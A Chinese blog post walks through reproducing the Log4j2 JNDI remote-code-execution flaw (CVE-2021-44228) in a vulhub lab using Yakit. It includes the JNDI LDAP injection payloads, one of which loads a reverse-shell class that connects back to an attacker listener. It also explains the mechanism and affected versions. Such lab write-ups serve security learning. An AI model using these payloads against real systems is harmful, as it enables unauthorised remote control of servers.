通过Yakit单兵作战工具进行log4j2 RCE漏洞复现(CVE-2021-44228)

已于 2024-08-04 16:37:16 修改
阅读量796 收藏 20
点赞数 14
分类专栏: CVE复现 文章标签: web安全 java log4j 安全
于 2024-08-04 16:35:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72037303/article/details/140907690
版权

一,靶场搭建

在家庭局域网的另一条Ubuntu24笔记本中,使用vulhub靶场搭建,首先下载vulhub,解压并进入目录/vulhub/log4j/CVE-2021-44228中,执行docker启动命令

docker compose up -d

宝塔查看靶场信息

在这里插入图片描述

接下来我们直接访问靶机ip的 8993 端口即可看到靶场

在这里插入图片描述

二,漏洞验证

首先使用 Yakit的DNSLog 平台获取一个子域名

这里获取到的子域名为:ykbdqepxgy.dgrh3.cn

在这里插入图片描述

使用该子域名,我们构造 payload:

${jndi:ldap://ykbdqepxgy.dgrh3.cn}

在目标网站,找到注入点

在这里插入图片描述

点击Add Core后,Logging会增加error日志,从而触发漏洞。

DNSLog出现反连,漏洞验证成功,这里存在log4j2 远程代码执行漏洞

在这里插入图片描述

三,漏洞利用

在Yakit中,开启端口监听器,输入本机IP,和监听端口,这里设为4445,点击启动监听

在这里插入图片描述

便于后续连接反射shell

再打开一个反连服务器,设置本机IP,默认端口即可,设置payload,为恶意类,TcpReverseShell,反连主机和反连端口和刚才设置的监听器,保持一致。

在这里插入图片描述

复制上面的 ldap://192.168.0.104:4444/TqduOHDq构造新的payload

${jndi:ldap://192.168.0.104:4444/TqduOHDq}

返回网站的注入点,重复验证的步骤,注入payload

在这里插入图片描述

提交后,点击左侧的Logging显示报错日志,注入成功

在这里插入图片描述

返回Yakit的反连服务器,可以观察到反连信息

在这里插入图片描述

返回端口监听器,连接成功

在这里插入图片描述

这里注意要把 原始模式 取消,不然传入的命令无法正常执行,可能是一个小BUG,执行ls命令成功

在这里插入图片描述

漏洞复现成功

四,原理分析

这个漏洞的核心是Java Naming and Directory Interface(JNDI)注入攻击,Log4j2在处理日志消息时,会自动解析其中的特定格式字符串,包括${}中的表达式。例如,${env:VAR}可以用来输出环境变量VAR的值。这种功能本身是为了方便开发人员获取动态内容。

然而,Log4j2也支持通过JNDI从远程服务器获取数据。这意味着,如果日志消息中包含类似${jndi:ldap://example.com/a}的字符串,Log4j2会尝试通过JNDI从ldap://example.com/a获取数据。

由于JNDI查找可以通过多种协议(如LDAP、RMI、DNS等)访问远程服务器,这个漏洞允许攻击者通过在日志消息中嵌入恶意的JNDI查找字符串,远程执行任意代码(RCE),从而完全控制受影响的系统。

从网上找了个图

五,影响版本

受影响版本范围:2.0 ≤ Apache Log4j2 < 2.15.0-rc2

此外对于java版本的要求

在这里插入图片描述

如果想要自己在本地通过java代码复现漏洞一定要注意java版本,在这里踩了几天的坑。

李应然
关注
  • 14
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-44228 log4j RCE漏洞原理详细分析排查和修补
m0_61506558的博客
09-14 1405
影响范围和排查方法1、CVE-2021-44228影响版本使用了log4j的组件,并且版本在 2.x
Log4j CVE-2021-44228 漏洞及Spring Boot解决方案
oscar999的专栏
12-17 2076
Log4j 的2 到 2.14 版本最近爆出了一个比较大的漏洞漏洞编号是CVE-2021-44228。本篇对该漏洞进行简单介绍, 并介绍Spring Boot项目如何解决该漏洞
Yakit真的这么好用?听听他们怎么用Yakit实现安全能力融合
四维创智
10-31 2273
是的,自Yakit跟随Yak在2021Xcon大会首次亮相以来,Yaklang团队就期望与用户之间达成长久并肩的伙伴关系。“从某种意义上来说Yakit比B*** S**te更强!还记得我们官网yaklang.com的那句话吗?“Yaklang拯救了学新语言从入门到放弃的我”“覆盖渗透测试全流程,Yakit方便又强大”“再不用Yakit,卷王就是别人的了”节目还会不会有第二期,取决于你们。什么是好用的安全测试工具
还在买别人的漏扫GUI?使用Yakit,免做老韭菜
棉花糖的博客
06-12 2489
你是否希望能有一个工具可以只需要输入或者导入目标即可检测某一个oa或者某一个系统的漏洞?上网一查,好像大家都在售卖这种GUI?👇工具乍一看,哇好牛逼,输入或者导入目标就可以检测例如海康威视综合安防管理平台这种系统的历史漏洞,细一看,我操要钱!而现在,你不需要再去交智商税了!首先我们要清楚一件事,这些工具里面的漏洞,是什么未公开的0day吗?
工具分享】yakit——单兵渗透工具
LongL_GuYu的博客
07-09 891
Yakit 是一个基于 Yak 语言的安全领域垂直语言工具,它提供了一个图形化用户界面(GUI)来操控 Yak 引擎的能力。Yakit 旨在降低使用安全工具的门槛,使得安全从业者即使没有编程技能也能轻松地进行安全测试和分析。
Yakit- 集成化单兵安全能力平台使用教程·进阶篇
xnxqwzy的博客
03-02 2701
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。③ 了解这些工具的使用场景,懂得基本的使用,推荐在Google上查找。
gmailc2:一款基于Google SMTP的完全无法检测的C2服务器
qq_53058639的博客
07-24 521
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
CVE-2021-44228——Log4j2-RCE漏洞复现
「 虚幻私塾」
01-20 676
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 0x00 漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3
log4j2 CVE-2021-44228漏洞复现
qq_14902381的博客
08-10 745
vulfocus靶场log4j2 漏洞CVE-2021-44228复现
Log4j2远程代码执行漏洞复现(cve-2021-44228)
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4j是Apache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
Apache Log4j2(CVE-2021-44228) 高危安全漏洞介绍
m0_54899775的博客
12-13 2347
Apache Log4j2(CVE-2021-44228) 高危安全漏洞介绍 史诗级漏洞
工具介绍】Yakit——基础爬虫
LongL_GuYu的博客
07-18 509
众所周知,爬虫是主动漏洞扫描中极其重要的一环。在漏洞扫描中,爬虫被用作一种数据收集工具,用于获取目标系统的信息以帮助我们发现漏洞
集成化单兵安全能力平台-Yakit
siu~
12-13 4304
`Yakit` 简单来讲就是一个安全平台,平台里支持很多功能模块(`渗透测试、资产搜集、漏洞检测、反连管理`等) 是一款非常优秀强悍的安全测试工具
使用Yak搭建Log4j漏洞检测工具
YakProject的博客
11-07 321
当然,以上是用最简单的方式进行Log4j复现和检测,如果需要检测线上环境是否有漏洞,可以把OpenLDAP环境地址映射到外网。如果真的做成生产力工具,还需要考虑更多的情况,比如线程、参数等等,文章中的Yak代码也有优化的空间,最后可以ssh到日志环境,根据日志信息用字符串判断是否触发漏洞,达到Log4j漏洞判断的自动化。本文只是简单的应用,入门而已,Yak还有很多精彩的特性,作者也还在学习中。总之Yak是整合了当前多种安全工具和开源项目,让安全从业人员无需安装复杂的依赖,就能上手工作。
Log的使用
dananhai381的专栏
11-16 142
[b][size=18]log4j的基本概念[/size][/b] 使用log4j大概涉及3个主要概念: 公共类 Logger Logger 负责处理日志记录的大部分操作。 公共接口 Appender Appender 负责控制日志记录操作的输出。 公共抽象类Layout Layout 负责格式化Appender的输出。 [b]3.1.Logger[/b] 日志记录器(Lo...
Yakit介绍
wangnvshibeib的博客
03-27 682
作为一家专注于跨境运输的物流服务平台,Yakit将继续致力于提升用户体验和服务质量,拓展更多的物流网络和合作伙伴,为用户提供更加便捷、高效、可靠的国际物流服务。在全球化日益盛行的今天,越来越多的人需要进行国际间的物品寄送,无论是个人用户寄送礼物、样品,还是小型企业寄送商品、文件,Yakit都能提供一站式的物流服务,满足用户的多样化需求。Yakit平台可以根据用户输入的物品信息和目的地国家的税收政策,为用户预估可能需要缴纳的关税和税费,帮助用户提前做好预算。用户可以根据自己的语言习惯选择合适的界面语言。
网络安全单兵工具 -- YAKIT
热门推荐
weixin_41489908的博客
01-28 2万+
网络安全单兵工具 -- YAKIT 一、下载及安装 1、原作者及下载地址 https://github.com/yaklang/yakit 2、双击下载好的exe文件,点击核心引擎安装与升级 3、点击意见更新Yak引擎 4、以管理员启动 5、点击连接引擎 二、使用方法 1、扫描端口/指纹 2、爆破与未授权 3、专项漏洞检查 禁止非法,后果自负 欢迎关注公众号:web安全工具库 欢迎关注视频号:之乎者也吧 ...
Yakit学习
weixin_56537388的博客
09-14 485
这个模块相当于burpsuite的proxy模块,MITM 操作台可百分百替代 BurpSuite执行所有操作(下载并安装证书、劫持请求、响应、编辑劫持到的数据包等)。并且提供一整套顺畅的工作流,劫持=>History=>Repeater/Intruder,劫持数据,在History查看历史数据,选择需要“挖掘”的数据包,发送到Web Fuzzer进行Repeater/Intruder操作。除了这些典型的操作场景外,MITM还提供了插件被动扫描、热加载、数据包替换、标记等更灵活的功能。这里小白推荐直接选择免
Apache Log4j2远程代码执行漏洞(CVE-2021-45105/CVE-2021-44228)、
最新发布
08-22
Apache Log4j2是一个广泛使用的日志框架,用于Java应用程序的日志记录。CVE-2021-45105和CVE-2021-44228是针对该框架的一个严重安全漏洞,也被称为Log4Shell或Log4J RCE(Remote Code Execution)。这个漏洞源于Log4j库的一个设计缺陷,当处理某些特定类型的外部输入数据时,攻击者可以构造恶意的控制字符序列,使得日志处理器执行任意的Java代码,从而实现了远程代码执行。 攻击者可以通过受影响的应用程序访问的日志系统接口,将恶意脚本插入到日志消息中。如果应用服务器配置不当,比如默认开启了对用户提交日志的解析功能,就可能导致这种漏洞被利用,攻击者可以窃取敏感信息,甚至完全控制受影响的系统。 修复此漏洞通常需要更新到最新的Log4j2版本,并确保适当的安全配置,例如禁用不受信任的特性或者关闭日志处理器的功能。同时,也应该检查并修复所有可能受到漏洞影响的服务和组件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值